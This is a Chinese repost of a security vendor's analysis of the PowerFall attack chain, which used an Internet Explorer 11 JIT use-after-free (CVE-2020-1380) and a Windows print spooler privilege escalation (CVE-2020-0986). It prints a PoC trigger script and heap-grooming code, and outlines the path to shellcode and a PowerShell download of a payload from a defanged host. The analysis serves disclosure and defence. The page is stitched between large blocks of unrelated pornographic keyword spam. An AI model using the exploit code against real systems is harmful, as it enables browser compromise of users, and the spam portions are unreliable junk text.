精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

大神淺談:IE和Windows的兩個0-day漏洞分析

安全 漏洞
與我們以前在WizardOpium惡意活動中發現的攻擊鏈不同,新的攻擊鏈可以針對Windows 10的最新版本發動攻擊。經過測試表明,該漏洞可以可靠地在Internet Explorer 11和Windows 10 x64的18363版本上利用。

0x00 概述

2020年5月,卡巴斯基成功防御了Internet Explorer惡意腳本對某家韓國企業的攻擊。經過進一步分析發現,該工具使用了以前未知的完整利用鏈,其中包括兩個0-day漏洞:Internet Explorer遠程代碼執行漏洞、Windows特權提升漏洞。與我們以前在WizardOpium惡意活動中發現的攻擊鏈不同,新的攻擊鏈可以針對Windows 10的最新版本發動攻擊。經過測試表明,該漏洞可以可靠地在Internet Explorer 11和Windows 10 x64的18363版本上利用。

[[338727]]

2020年6月8日,我們向Microsoft報告了我們的發現,并且Microsoft已確認漏洞。在我們撰寫報告時,Microsoft的安全團隊已經針對CVE-2020-0986漏洞發布了補丁,修復這一特權提升0-day漏洞。但是,在我們發現該漏洞之前,這一漏洞的可利用性被評估為“不太可能”。CVE-2020-0986的修復程序在2020年6月9日發布。

Microsoft為JScript的Use-After-Free漏洞分配了CVE-2020-1380編號,該漏洞的補丁于2020年8月11日發布。

 

大神淺談:IE和Windows的兩個0-day漏洞分析

我們將這一系列攻擊稱為PowerFall惡意活動。目前,我們暫時不能將惡意活動與任何已知的威脅行為者建立明確聯系,但根據它與以前發現漏洞的相似性,我們認為DarkHotel可能是此次攻擊的幕后黑手。卡巴斯基產品目前將PowerFall攻擊檢測為“PDM:Exploit.Win32.Generic”。

0x01 Internet Explorer 11遠程代碼執行漏洞

在野外發現的Internet Explorer最新0-day攻擊利用了舊版本JavaScript引擎jscript.dll中的漏洞CVE-2020-0674、CVE-2019-1429、CVE-2019-0676和CVE-2018-8653。其中,CVE-2020-1380是jscript9.dll中的一個漏洞,該漏洞自Internet Explorer 9開始存在,因此Microsoft建議的緩解步驟(限制jscript.dll的使用)無法針對這個特定漏洞實現防護。

CVE-2020-1380是一個釋放后使用(Use-After-Free)漏洞,由于JIT優化過程中,JIT編譯的代碼中缺少必要的檢查導致。下面展示了觸發漏洞的PoC:

  1. function func(O, A, F, O2) { 
  2.     arguments.push = Array.prototype.push; 
  3.     O = 1; 
  4.     arguments.length = 0; 
  5.     arguments.push(O2); 
  6.     if (F == 1) { 
  7.         O = 2; 
  8.     } 
  9.  
  10.     // execute abp.valueOf() and write by dangling pointer 
  11.     A[5] = O; 
  12. }; 
  13.  
  14. // prepare objects 
  15. var an = new ArrayBuffer(0x8c); 
  16. var fa = new Float32Array(an); 
  17.  
  18. // compile func 
  19. func(1, fa, 1, {}); 
  20. for (var i = 0; i < 0x10000; i++) { 
  21.     func(1, fa, 1, 1); 
  22.  
  23. var abp = {}; 
  24. abp.valueOf = function() { 
  25.  
  26.     // free  
  27.     worker = new Worker('worker.js'); 
  28.     worker.postMessage(an, [an]); 
  29.     worker.terminate(); 
  30.     worker = null
  31.  
  32.     // sleep 
  33.     var start = Date.now(); 
  34.     while (Date.now() - start < 200) {} 
  35.  
  36.     // TODO: reclaim freed memory 
  37.  
  38.     return 0 
  39. }; 
  40.  
  41. try { 
  42.     func(1, fa, 0, abp); 
  43. } catch (e) { 
  44.     reload() 

要理解這一漏洞,我們首先看一下func()的執行方式。這里,重要的是了解將什么值設置為A[5]。根據代碼,與之相關的應該是一個參數O。在函數開始時,會將參數O重新分配為1,但隨后將函數參數長度設置為0。這個操作不會清除函數參數(通常,常規數組會這樣做),但允許將參數O2放在索引為0的參數列表1中,這意味著O = O2。除此之外,如果參數F等于1,則會再次重新分配O,但這次會分配整數2。這意味著,根據參數F的值,O參數會等于O2參數的值或是整數2。參數A是32位浮點型數組,在將值分配給數組的索引5之前,會將值首先轉換為浮點數。將整數轉換為浮點數的過程比較簡單,但是如果要將對象轉換為浮點數,這個過程就不再那么簡單了。該漏洞利用使用了重載方法valueOf()中的abp對象。當對象轉換為浮點型時執行此方法,但是在其內部,包含釋放ArrayBuffer的代碼,該代碼由Float32Array查看,并在其中設置返回值。為了防止將值存儲在已釋放對象的內存中,JavaScript引擎需要首先檢查對象的狀態,然后再將值存儲在對象中。為了安全地轉換和存儲浮點值,JScript9.dll使用函數Js::TypedArray::BaseTypedDirectSetItem()。下面是這個函數的反編譯代碼:

  1. int Js::TypedArray<float,0>::BaseTypedDirectSetItem(Js::TypedArray<float,0> *this, unsigned int index, void *object, int reserved) 
  2.     Js::JavascriptConversion::ToNumber(object, this->type->library->context); 
  3.     if ( LOBYTE(this->view[0]->unusable) ) 
  4.         Js::JavascriptError::ThrowTypeError(this->type->library->context, 0x800A15E4, 0); 
  5.     if ( index < this->count ) 
  6.     { 
  7.         *(float *)&this->buffer[4 * index] = Js::JavascriptConversion::ToNumber( 
  8.             object, 
  9.             this->type->library->context); 
  10.     } 
  11.     return 1; 
  12.  
  13. double Js::JavascriptConversion::ToNumber(void *object, struct Js::ScriptContext *context) 
  14.     if ( (unsigned char)object & 1 ) 
  15.         return (double)((int)object >> 1); 
  16.     if ( *(void **)object == VirtualTableInfo<Js::JavascriptNumber>::Address[0] ) 
  17.         return *((double *)object + 1); 
  18.     return Js::JavascriptConversion::ToNumber_Full(object, context); 

該函數檢查浮點型數組的view[0]->unusable和count字段。在執行valueOf()方法的過程中,當ArrayBuffer被釋放時,這兩項檢查都將失敗,因為此時view[0]->unusable為1,并且在第一次調用Js::JavascriptConversion::ToNumber()時count為0。問題在于,Js::TypedArray::BaseTypedDirectSetItem()函數僅在解釋模式下使用。

當函數func()被即時編譯時,JavaScript引擎將會使用以下存在漏洞的代碼:

  1. if ( !((unsigned char)floatArray & 1) && *(void *)floatArray == &Js::TypedArray<float,0>::vftable ) 
  2.   if ( floatArray->count > index ) 
  3.   { 
  4.     buffer = floatArray->buffer + 4*index
  5.     if ( object & 1 ) 
  6.     { 
  7.       *(float *)buffer = (double)(object >> 1); 
  8.     } 
  9.     else 
  10.     { 
  11.       if ( *(void *)object != &Js::JavascriptNumber::vftable ) 
  12.       { 
  13.         Js::JavascriptConversion::ToFloat_Helper(object, (float *)buffer, context); 
  14.       } 
  15.       else 
  16.       { 
  17.         *(float *)buffer = *(double *)(object->value); 
  18.       } 
  19.     } 
  20.   } 

這是Js::JavascriptConversion::ToFloat_Helper()函數的代碼:

  1. void Js::JavascriptConversion::ToFloat_Helper(void *object, float *buffer, struct Js::ScriptContext *context) 
  2.   *buffer = Js::JavascriptConversion::ToNumber_Full(object, context); 

如我們所見,與解釋模式不同,在即時編譯的代碼中,不會檢查ArrayBuffer的生命周期,并且可以釋放它的內存,然后在調用valueOf()函數時將其回收。此外,攻擊者可以控制將返回值寫入到哪個索引中。但是,在arguments.length = 0;和arguments.push(O2);的情況下,PoC會將其替換為arguments[0] = O2;,所以Js::JavascriptConversion::ToFloat_Helper()就不會觸發這個Bug,因為隱式調用將被禁用,并且不會執行對valueOf()函數的調用。

為了確保及時編譯函數func(),漏洞利用程序會執行該函數0x10000次,對整數進行無害的轉換,并且只有在再次執行func()之后,才會觸發Bug。為了釋放ArrayBuffer,漏洞利用使用了一種濫用Web Workers API的通用技術。postMessage()函數可以用于將對象序列化為消息,并將其發送給worker。但是,這里的一個副作用是,已傳輸的對象會被釋放,并且在當前腳本上下文中變為不可用。在釋放ArrayBuffer后,漏洞利用程序通過模擬Sleep()函數使用的代碼觸發垃圾回收機制。這是一個while循環,用于檢查Date.now()與先前存儲的值之間的時間間隔。完成后,漏洞利用會使用整數數組回收內存。

  1. for (var i = 0; i < T.length; i += 1) { 
  2.         T[i] = new Array((0x1000 - 0x20) / 4); 
  3.         T[i][0] = 0x666; // item needs to be set to allocate LargeHeapBucket 
  4.     } 

在創建大量數組后,Internet Explorer會分配新的LargeHeapBlock對象,這些對象會被IE的自定義堆實現使用。LargeHeapBlock對象將存儲緩沖區地址,將這些地址分配給數組。如果成功實現了預期的內存布局,則該漏洞將使用0覆蓋LargeHeapBlock偏移量0x14處的值,該值恰好是分配的塊數。

jscript9.dll x86的LargeHeapBlock結構:

 

大神淺談:IE和Windows的兩個0-day漏洞分析

此后,漏洞利用會分配大量的數組,并將它們設置為在漏洞利用初始階段準備好的另一個數組。然后,將該數組設置為null,漏洞利用程序調用CollectGarbage()函數。這將導致堆碎片整理,修改后的LargeHeapBlock及其相關的數組緩沖區將被釋放。在這個階段,漏洞利用會創建大量的整數數組,以回收此前釋放的數組緩沖區。新創建的數組的魔術值設置為索引0,該值通過指向先前釋放的數組的懸空指針以進行檢查,從而確認漏洞利用是否成功。

  1. for (var i = 0; i < K.length; i += 1) { 
  2.            K[i] = new Array((0x1000 - 0x20) / 4); 
  3.            K[i][0] = 0x888; // store magic 
  4.        } 
  5.  
  6.        for (var i = 0; i < T.length; i += 1) { 
  7.            if (T[i][0] == 0x888) { // find array accessible through dangling pointer 
  8.                R = T[i]; 
  9.                break; 
  10.            } 
  11.        } 

最后,漏洞利用創建了兩個不同的JavascriptNativeIntArray對象,它們的緩沖區指向相同的位置。這樣,就可以檢索對象的地址,甚至可以創建新的格式錯誤的對象。該漏洞利用使用這些原語來創建格式錯誤的DataView對象,并獲得對該進程整個地址空間的讀/寫訪問權限。

在構建了任意的讀/寫原語之后,就可以繞過控制流防護(CFG)并執行代碼了。該漏洞利用使用數組的vftable指針獲取jscript9.dll的模塊基址。從這里,它解析jscript9.dll的PT頭,以獲得導入目錄表的地址,并解析其他模塊的基址。這里的目標是找到函數VirtualProtect()的基址,該地址將用于執行Shellcode的過程。之后,漏洞利用程序在jscript9.dll中搜索兩個簽名。這些簽名對應Unicode字符串split和JsUtil::DoublyLinkedListElement::LinkToBeginning()函數地址。Unicode字符串split的地址用于獲取對該字符串的代碼引用,并借助它來幫助解析函數Js::JavascriptString::EntrySplit()的地址,該函數實現了字符串方法split()。函數LinkToBeginning()的地址用于獲取全局鏈表中第一個ThreadContext對象的地址。這個漏洞利用程序會在鏈表中找到最后一個條目,并利用它為負責執行腳本的線程獲取堆棧位置。然后,就到了最后一個階段。漏洞利用程序執行split()方法,并提供一個具有重載valueOf()方法的對象作為限制參數。在執行Js::JavascriptString::EntrySplit()函數的過程中,執行重載的valueOf()方法時,漏洞利用程序將搜索線程的堆棧以查找返回地址,將Shellcode放置在準備好的緩沖區中,獲取其地址。最后,通過覆蓋函數的返回地址,構建一個面向返回的編程(ROP)鏈以執行Shellcode。

0x02 下一階段

Shellcode是附加到Shellcode上的可移植可執行(PE)模塊的反射DLL加載器。這個模塊非常小,全部功能都位于單個函數內。它在名為ok.exe的臨時文件夾中創建一個文件,將遠程執行代碼中利用的另一個可執行文件的內容寫入到其中。之后,執行ok.exe。

ok.exe可執行文件包含針對GDI Print / Print Spooler API中的任意指針解引用特權提升漏洞(CVE-2020-0986)。該漏洞最初是一位匿名用戶通過Trend Micro的Zero Day Initiative計劃向Microsoft報告的。由于該漏洞在報告后的6個月內未發布補丁,因此ZDI將這一0-day漏洞進行披露,披露日期為2020年5月19日。第二天,這一漏洞就已經在先前提到的攻擊中被利用。

利用這一漏洞,可以使用進程間通信來讀取和寫入splwow64.exe進程的任意內存,并繞過CFG和EncodePointer保護,從而實現splwow64.exe中的代碼執行。該漏洞利用程序的資源中嵌入了兩個可執行文件。第一個可執行文件以CreateDC.exe的形式寫入磁盤,并用于創建設備上下文(DC),這是漏洞利用所必需的。第二個可執行文件的名稱為PoPc.dll,如果利用成功,會由具有中等完整性級別的splwow64.dll執行。我們將在后續文章中提供有關CVE-2020-0986及其漏洞利用的更多信息。

從splwow64.exe執行惡意PowerShell命令:

 

大神淺談:IE和Windows的兩個0-day漏洞分析

PoPc.dll的主要功能也位于單個函數之中。它執行一個編碼后的PowerShell命令,該命令用于從www[.]static-cdn1[.]com/update.zip下載文件,將其保存為臨時文件upgrader.exe并執行。由于卡巴斯基已經在下載可執行文件前阻止了攻擊,因此我們未能拿到upgrader.exe,無法對其進行進一步分析。

責任編輯:未麗燕 來源: 今日頭條
相關推薦

2024-03-06 13:27:23

2021-03-16 10:52:56

Chrome瀏覽器漏洞

2013-11-15 15:36:23

2013-11-20 14:44:07

2010-03-30 09:26:46

2021-07-17 06:41:12

谷歌Chrome瀏覽器

2013-04-08 15:44:28

2021-11-29 11:50:47

Windows 操作系統漏洞

2022-12-02 14:12:14

漏洞間諜軟件

2013-07-16 09:38:50

2021-11-01 11:59:56

Windows 操作系統漏洞

2010-01-20 16:13:15

2015-08-28 13:37:39

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2016-12-19 15:58:34

2022-04-26 06:37:18

漏洞網絡安全網絡攻擊

2017-01-03 19:48:33

2009-11-29 16:53:17

2025-02-25 10:52:24

2021-11-10 18:11:46

微軟補丁漏洞
點贊
收藏

51CTO技術棧公眾號

日韩在线观看电影完整版高清免费| 久久精品在线免费观看| 超碰97人人做人人爱少妇| 中文字幕avav| 欧美三级网站| 中文字幕免费在线观看视频一区| 91精品综合视频| 国产一国产二国产三| 欧美free嫩15| 亚洲人成伊人成综合网小说| 精品欧美一区二区在线观看视频| 国产大片免费看| 美女视频亚洲色图| 欧美日韩一区二区三区免费看| 九色综合日本| 国产精品视频无码| 性xx色xx综合久久久xx| www.欧美免费| 亚洲国产精品成人综合久久久| 国产精品99精品一区二区三区∴| 亚洲伊人色欲综合网| 日本不卡高清视频一区| www视频在线| 日韩精品电影在线观看| 欧美精品久久一区二区| a级黄色免费视频| 免费福利视频一区| 日韩情涩欧美日韩视频| 久久午夜夜伦鲁鲁一区二区| 国产在线拍揄自揄拍视频| 久久久久久97三级| 国产一区二区中文字幕免费看| 亚洲视频久久久| 99视频精品| 欧美疯狂做受xxxx高潮| 特黄特黄一级片| 欧美精品高清| 高跟丝袜欧美一区| 国产毛片久久久久久国产毛片| 瑟瑟视频在线| 日本一区二区高清| 欧美日韩一区在线播放| 亚洲 国产 欧美 日韩| 国产一区二区三区观看| 国产欧美精品在线播放| 日韩xxx视频| 天堂精品中文字幕在线| 欧美在线日韩在线| 中文字幕伦理片| 牲欧美videos精品| 亚洲国产免费av| 波多野结衣三级视频| 24小时免费看片在线观看| 亚洲另类在线制服丝袜| 91手机在线观看| 99国产在线播放| 国产一区二三区好的| 91精品国产综合久久男男| 中文字幕一区二区久久人妻| 日日摸夜夜添夜夜添国产精品 | 色综合久久久久综合体| 日本日本19xxxⅹhd乱影响| 2020国产在线| 精品福利在线看| 黄色一级视频片| 天堂在线中文网官网| 欧美日韩视频在线| 国产中文字幕在线免费观看| 伊人久久视频| 在线视频国产一区| 亚洲天堂2018av| 污片在线免费观看| 亚洲自拍与偷拍| 欧美人成在线观看| 热三久草你在线| 欧美体内谢she精2性欧美| 久草精品在线播放| se69色成人网wwwsex| 欧美日韩国产综合视频在线观看 | 久草成人在线视频| 亚洲欧美校园春色| 国产亚洲激情在线| 国产成人精品一区二区三区在线观看| 亚洲一区二区三区在线免费| 亚洲第一福利视频| 波多野结衣av在线观看| 色爱综合网欧美| 欧美剧在线观看| 在线观看国产亚洲| 日韩精品一区第一页| 国产欧美日韩综合精品| 超碰在线观看av| 久久久www免费人成精品| 欧美精品一区二区三区久久| www亚洲人| 亚洲影院理伦片| 别急慢慢来1978如如2| 欧美a在线观看| 亚洲国产欧美一区二区丝袜黑人 | 手机av在线网| 国产精品乱战久久久| 亚洲片在线观看| 国产女人被狂躁到高潮小说| 亚洲一区区二区| 国产一区二区香蕉| 无码国产精品一区二区色情男同| 欧美国产激情二区三区| 美女扒开大腿让男人桶| 国产成人a视频高清在线观看| 日韩精品一区二区在线| 一级黄色性视频| 精品动漫3d一区二区三区免费版 | 波多野结衣绝顶大高潮| 国产成人超碰人人澡人人澡| 日韩欧美电影一区二区| 国产精品国精产品一二| 欧美亚洲高清一区二区三区不卡| 国产艳妇疯狂做爰视频| 成人羞羞视频播放网站| 亚洲美女av网站| 卡通动漫亚洲综合| 日韩成人一区二区| 国产伦精品一区二区三区视频免费| 香蕉视频免费在线播放| 黑人巨大精品欧美一区二区三区| 91视频福利网| 四季av一区二区三区免费观看| 久久人人爽人人爽人人片av高清| 在线观看亚洲国产| 久久久99精品免费观看不卡| 男女超爽视频免费播放| 免费观看性欧美大片无片| 这里只有精品视频在线| 国产乱国产乱老熟| av网站一区二区三区| 超碰97在线资源| 欧美一区二区三区在线观看免费| 欧美视频第一页| 亚洲一级av无码毛片精品| 午夜天堂精品久久久久| 九九热r在线视频精品| 中文字幕有码无码人妻av蜜桃| 久久嫩草精品久久久久| 无码人妻精品一区二区三区在线| av综合电影网站| 精品国产露脸精彩对白| 九九九在线视频| 国产精品亚洲人在线观看| 青少年xxxxx性开放hg| 国产精品久久久久久久久免费高清| 亚洲欧美综合精品久久成人| 麻豆久久久久久久久久| 91在线你懂得| 国产aaa一级片| 亚洲精品大片| 色噜噜狠狠狠综合曰曰曰 | 91精品国产免费| 小向美奈子av| 国产一区二区h| 欧美日韩激情四射| 91麻豆精品激情在线观看最新| 精品少妇v888av| 成人毛片视频免费看| 亚洲二区在线观看| 亚洲男人在线天堂| 久久香蕉精品| 中文字幕色一区二区| 国产精品777777在线播放| 欧美大胆在线视频| 国产综合在线播放| 色综合一区二区三区| 内射毛片内射国产夫妻| 毛片av一区二区| 中文字幕一区二区三区在线乱码| 国产日韩在线观看视频| 久久男人资源视频| 国产中文在线| 欧美美女激情18p| 欧美成人一区二区三区高清| 成人国产精品视频| 日韩视频免费在线播放| 99re久久最新地址获取| 91嫩草视频在线观看| 九色porny丨入口在线| 在线精品播放av| 国产精品一区二区三区在线免费观看 | 亚欧美中日韩视频| 亚洲欧洲另类精品久久综合| 久久伊人影院| 欧美在线一级va免费观看| 1769视频在线播放免费观看| 日韩视频中午一区| www.国产毛片| 亚洲乱码中文字幕综合| 三上悠亚影音先锋| 欧美日韩国产色综合一二三四| 国产精品一区二区免费| 日韩国产网站| 欧美激情精品久久久久久蜜臀| 久久经典视频| 欧美tk—视频vk| 在线观看亚洲黄色| 亚洲福中文字幕伊人影院| 在线观看免费小视频| 国产成人在线视频免费播放| 欧在线一二三四区| 国产精品红桃| 亚洲一区精彩视频| 色吊丝一区二区| 91传媒在线免费观看| 日本精品在线中文字幕| 欧美激情一二三| av国产在线观看| 亚洲精品色婷婷福利天堂| www.亚洲黄色| 欧美群妇大交群的观看方式| 成人在线免费看视频| 一区二区在线观看视频| 日韩精品电影一区二区三区| 99久久精品国产一区二区三区| 欧美男女交配视频| 午夜亚洲一区| a级黄色一级片| 欧美午夜一区二区福利视频| 一本色道久久综合亚洲二区三区| 日韩三级视频| 国产精品二区在线| 国产高清精品二区| 国产精品一区二区电影| 亚洲高清黄色| 日本三级久久久| 免费一二一二在线视频| 欧美激情欧美狂野欧美精品| 成人在线观看免费网站| 日韩精品一区二区三区四区| 中国老头性行为xxxx| 一本色道久久综合亚洲91| 成人毛片18女人毛片| 午夜精品国产更新| 级毛片内射视频| 97se亚洲国产综合自在线| 精品人妻二区中文字幕| 国产精品99久久久久久似苏梦涵 | 色综合五月天导航| h片在线免费观看| 久久精品99国产精品酒店日本| 爱久久·www| 伊人亚洲福利一区二区三区| 精品推荐蜜桃传媒| 亚洲日本欧美中文幕| 欧美日本韩国一区二区| 精品中文视频在线| 欧洲成人av| 国产一区二区黑人欧美xxxx| 九色在线观看视频| 在线观看亚洲区| 日本不卡不卡| 色综合导航网站| 97在线超碰| 97成人超碰免| 欧美大片免费高清观看| 国产精品福利网站| 欧美性生活一级| 91亚洲永久免费精品| 欧美黄视频在线观看| 国产欧美日本在线| 日本国产精品| 天堂av一区二区| 久久久精品久久久久久96| 久久天天东北熟女毛茸茸| 欧美激情自拍| 夫妻免费无码v看片| 日韩av在线免费观看不卡| 视频在线99| 婷婷综合伊人| 91网站在线观看免费| 在线欧美亚洲| 黄色一级一级片| 捆绑变态av一区二区三区| 久久久国产精品久久久| 日韩高清一区二区| 亚洲免费999| 国产1区2区3区精品美女| 黄色国产在线观看| 国产精品网曝门| 精品深夜av无码一区二区老年| 日本一区二区三区四区在线视频 | 欧美一区二区三区免费看| 毛片在线播放视频| 蜜桃91丨九色丨蝌蚪91桃色| 国产精品偷伦视频免费观看了| 久久人人爽人人爽| 久草视频在线免费看| 在线观看国产日韩| 高潮一区二区三区乱码| 在线观看国产欧美| 国产啊啊啊视频在线观看| 国产精品久久久久国产a级| 97成人在线| 亚洲欧洲三级| 另类av一区二区| 4438x全国最大成人| 中文字幕不卡三区| 天天操天天摸天天干| 91精品国产综合久久久蜜臀图片| 欧美日韩激情视频一区二区三区| 欧美福利视频在线| 欧美aaaaaaaa| 日本精品一区二区三区不卡无字幕| 欧美阿v一级看视频| 国产又大又黄又猛| 久久综合色天天久久综合图片| 看片网站在线观看| 欧美日韩日日骚| 可以直接在线观看的av| 91av视频在线免费观看| 天堂久久av| 日韩第一页在线观看| 蜜臀av国产精品久久久久| 91视频免费观看网站| 亚洲v中文字幕| 亚洲第一色网站| 久久久极品av| 色猫猫成人app| 欧美激情专区| 亚洲视频狠狠| 最新日本中文字幕| 成人免费一区二区三区在线观看| 久久影视中文字幕| 亚洲精品国产美女| 91超碰在线| 91久色国产| 欧美国产综合| 午夜精品免费看| 日本一区二区不卡视频| 久久精品五月天| 日韩av影院在线观看| 黄在线观看免费网站ktv| 成人做爰66片免费看网站| 国产传媒欧美日韩成人精品大片| 国产一区二区三区在线免费| 麻豆精品久久久| 91动漫免费网站| 日本黄色一区二区| 九色在线观看视频| 国产999精品| 亚洲丁香日韩| 亚洲人成色77777| 91农村精品一区二区在线| 少妇人妻好深好紧精品无码| 亚洲成人免费在线| 中文字幕人妻丝袜乱一区三区| 中文精品99久久国产香蕉| 日本精品网站| 亚洲一区二区三区免费看| 蜜臀久久99精品久久久久宅男 | 午夜精品蜜臀一区二区三区免费| 亚洲国产欧美国产第一区| 日韩欧美视频免费在线观看| 国产精品一区二区果冻传媒| 国产老头老太做爰视频| 欧美成人女星排行榜| 羞羞的网站在线观看| 国产a一区二区| 精品白丝av| 亚洲色成人网站www永久四虎| 欧美性猛交xxxxx水多| wwwxxx在线观看| 91精品久久久久| 欧美一区二区三区另类| 佐佐木明希电影| 亚洲免费av观看| 亚洲欧美另类一区| 91精品成人久久| 亚洲精品合集| 欧美婷婷精品激情| 亚洲欧美成人一区二区三区| 高清一区二区三区四区| 97在线日本国产| 狼人精品一区二区三区在线 | 91国内精品久久| yellow字幕网在线| 国产综合色一区二区三区| 一区二区三区午夜视频| aaa黄色大片| 粉嫩老牛aⅴ一区二区三区| 国产永久免费高清在线观看| 国产精品日韩欧美大师| 久久久久av| 精品一区二区视频在线观看 | 91精品一区二区三区四区| 国产成人综合亚洲网站| 国产第一页在线观看| 久久精品国产96久久久香蕉| 国产一区二区在线视频你懂的| 波多野结衣家庭教师视频| 亚洲欧洲精品天堂一级 | 国产精品中文欧美| 欧美日韩中文字幕在线观看| 亚洲精品小视频|